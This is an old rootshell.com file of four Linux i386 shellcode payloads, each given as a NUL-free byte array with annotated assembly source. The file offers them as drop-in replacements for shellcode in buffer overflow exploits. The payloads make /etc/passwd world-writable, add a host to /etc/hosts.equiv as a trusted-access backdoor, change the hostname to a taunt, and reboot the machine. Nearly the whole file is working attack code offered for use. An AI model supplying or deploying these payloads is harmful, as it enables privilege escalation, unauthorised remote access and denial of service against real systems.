|
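[ http://www.rootshell.com/ ] -----------------[ begin asmcodes.txt ]---------------------

-- Assembly drop in replacements --
(Probably useless, but can be a little fun ;-) )

Here are some assembly instructions that you can drop into your favorite
buffer overflow exploit. Generally, replacing the existing shellcode in an
existing buffer overrun with one of these is all you need to do, as long as
the new code fits in the space the old shellcode occupied (pad with NOPs if
it is shorter). Feel free to modify and experiment with these.
(Sorry about the null's in them before ;-) )

Notes that apply to all four payloads:

  * Target: Linux on 32-bit x86 (i386). Every call goes through `int $0x80`
    with the syscall number in %eax and the arguments in %ebx, %ecx, %edx.
    The numbers quoted below (chmod 15, open 5, write 4, exit 1, sync 36,
    sethostname 74, reboot 88) are the i386 ones from
    /usr/include/asm/unistd.h; the x86-64 `syscall` ABI uses different
    numbers and registers, so these do not work there as-is.
  * None of the four arrays contains a 0x00 byte, so they survive a
    strcpy()-style copy. Where a NUL is needed it is written at runtime:
    the hosts.equiv payload carries a 0x01 placeholder and zeroes it.
  * The chmod and hosts.equiv payloads write the NUL terminator of their
    pathname into their own bytes, so the buffer they land in must be
    writable as well as executable (a stack or heap buffer, as in the
    overflows these are meant for).
  * Return values are never checked. If open() fails, the following write()
    is issued on a bogus descriptor and simply fails; the other payloads
    likewise ignore errors and fall through to exit(). All four only do
    something useful when the exploited process runs as root.
  * Each array ends in "\x89\xec\x5d\xc3" (movl %ebp,%esp; popl %ebp; ret),
    the function epilogue that was captured when the snippet was compiled
    inside a C function. Nothing references it and exit() comes before it,
    so it is harmless padding.
  * The get-EIP trick at the top of each one is the same: jmp to a call,
    call back to a popl, so %edi ends up holding the address of the label
    that follows the call. Data is then addressed as %edi + (label - that
    label), and the offsets are small enough to fit an 8-bit immediate.

/* This one changes the mode on /etc/passwd to 777 */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"
"\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"
"\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"
"\x73\x73\x77\x64\x89\xec\x5d\xc3";

/* This one creates /etc/hosts.equiv with a host called b00ger */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"
"\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"
"\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31"
"\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"
"\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"
"\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";

/* This one is useless: it just changes the hostname to yEw_r_0wn3d */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"
"\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"
"\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"
"\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";

/* This is also useless: it just reboots an x86 machine */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"
"\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"
"\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"
"\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"
"\xcd\x80\x89\xec\x5d\xc3";

-- Source code --

# chmod("/etc/passwd", 0777): makes /etc/passwd writeable by anyone.
#
# Registers at the chmod call (i386 int $0x80 ABI):
#   %eax = 15 (0xf)  chmod   (see /usr/include/asm/unistd.h)
#   %ebx = pointer to "/etc/passwd"
#   %ecx = 0777
# %edi holds the address of the `yo` label and is the base for all data.

        jmp     rootshell
hey:
        popl    %edi                    # %edi = &yo (the call's return address)
        jmp     yo
rootshell:
        call    hey                     # rel32 is -8: no NUL bytes
yo:                                     # yo! w3rD!
        xorl    %ebx,%ebx
        movb    $(phile-yo),%bl         # offset of the path from `yo`
        addl    %edi,%ebx               # %ebx = &phile
        xorb    %al,%al
        movb    %al,11(%ebx)            # NUL-terminate "/etc/passwd" (11 chars) in place
        xorl    %ecx,%ecx
        movw    $00777,%cx              # mode 0777 (octal)
        xorl    %eax,%eax
        movb    $0xf,%al                # syscall 15 (0xf) is chmod (not chown)
        int     $0x80                   # chmod(); result in %eax is ignored
        xorl    %eax,%eax
        movb    $0x01,%al               # syscall 1 (0x01) is exit
        int     $0x80
phile:
        .ascii  "/etc/passwd"           # 11 bytes; terminator is written above
-------------------------

# open("/etc/hosts.equiv", O_WRONLY|O_CREAT|O_APPEND, 0644) and then
# write("b00ger\n") to it: creates the file if it does not exist, appends
# to it if it does. Changing the host is a matter of editing the string
# and the length passed to write().
#
# open():  %eax = 5, %ebx = path, %ecx = flags, %edx = mode; fd returned in %eax
# write(): %eax = 4, %ebx = fd,   %ecx = buf,   %edx = len
# The fd from open() is not checked; if it is negative (-errno) the write()
# just fails and the code falls through to exit().

        jmp     rootshell
coded_by_bmV:
        popl    %edi                    # %edi = &phoo
        jmp     phoo
rootshell:
        call    coded_by_bmV
phoo:                                   # ok. I meant 'foo'
        xorl    %ebx,%ebx
        movb    $(file-phoo),%bl        # offset of the path from `phoo`
        addl    %edi,%ebx               # %ebx = &file
        xorl    %eax,%eax               # %eax = 0 (the \x31\xc0 in the array above)
        movb    %al,16(%ebx)            # zero the 0x01 placeholder after the 16-char path
        xorl    %ecx,%ecx
        movw    $0x441,%cx              # O_WRONLY (1) | O_CREAT (0x40) | O_APPEND (0x400)
        xorl    %edx,%edx
        movw    $00644,%dx              # mode 0644 -rw-r--r--
        xorl    %eax,%eax
        movb    $0x5,%al                # syscall 5 (0x5) is open()
        int     $0x80
        movl    %eax,%ebx               # fd (or -errno, unchecked) -> %ebx
        xorl    %ecx,%ecx
        movb    $(string-phoo),%cl      # offset of "b00ger\n" from `phoo`
        addl    %edi,%ecx               # %ecx = &string
        xorl    %edx,%edx
        movb    $7,%dl                  # strlen("b00ger\n") == 7, newline included
        xorl    %eax,%eax
        movb    $0x04,%al               # syscall 4 is write()
        int     $0x80
        xorl    %eax,%eax
        movb    $0x01,%al               # syscall 1 (0x01) is exit(); exit closes the fd
        int     $0x80
file:
        .ascii  "/etc/hosts.equiv"      # 16 bytes
        .byte   1                       # placeholder for the NUL (keeps the array NUL-free)
string:
        .ascii  "b00ger\n"
-------------------------

# sethostname("yEw_r_0wn3d", 11): changes the hostname of the target
# machine. Written just for grins ;-)  Yes, I know this is useless :P
#
# %eax = 74 (0x4a, sethostname; see /usr/include/asm/unistd.h)
# %ebx = pointer to "yEw_r_0wn3d"
# %ecx = strlen("yEw_r_0wn3d") == 11
# A length is passed, so the name does not need a NUL terminator and
# nothing is patched at runtime.

        jmp     rootshell
by_bm5:
        popl    %edi                    # %edi = &asmcode
        jmp     asmcode
rootshell:
        call    by_bm5
asmcode:                                # assembly code ?
        xorl    %eax,%eax
        movb    $0x4a,%al               # syscall 74 (0x4a) is sethostname()
        xorl    %ebx,%ebx
        movb    $(string-asmcode),%bl   # offset of the name from `asmcode`
        addl    %edi,%ebx               # %ebx = &string
        xorl    %ecx,%ecx
        movb    $0x0b,%cl               # strlen("yEw_r_0wn3d") == 0xb
        int     $0x80                   # sethostname(); result ignored
        xorl    %eax,%eax
        movb    $0x01,%al               # syscall 1 (0x01) is exit()
        int     $0x80
string:                                 # immediately follows the exit, as in the array
        .ascii  "yEw_r_0wn3d"
-------------------------

# sync(); reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART)
# Reboots a Linux x86 box. Also quite useless, but good for learning.
#
# sync():   %eax = 36 (0x24)
# reboot(): %eax = 88 (0x58), %ebx = magic1, %ecx = magic2, %edx = cmd
#           (see /usr/include/asm/unistd.h and the reboot(2) manual page)
# The get-EIP prologue is kept for uniformity; this payload has no data
# to address, so %edi is never used.

        jmp     rootshell
coded_by_bmV:
        popl    %edi                    # %edi = &reb00t (unused here)
        jmp     reb00t
rootshell:
        call    coded_by_bmV
reb00t:
        xorl    %eax,%eax
        movb    $0x24,%al               # syscall 36 (0x24) is sync()
        int     $0x80
        xorl    %eax,%eax
        movb    $0x58,%al               # syscall 88 (0x58) is reboot()
        movl    $0xfee1dead,%ebx        # LINUX_REBOOT_MAGIC1
        movl    $672274793,%ecx         # LINUX_REBOOT_MAGIC2 (0x28121969)
        movl    $0x1234567,%edx         # LINUX_REBOOT_CMD_RESTART (0x01234567); read reboot(2)!
        int     $0x80                   # does not return if it succeeds
        xorl    %eax,%eax               # only reached if reboot() failed (e.g. not root)
        movb    $0x01,%al               # syscall 1 (0x01) is exit()
        int     $0x80
-------------------------

--> Have fun!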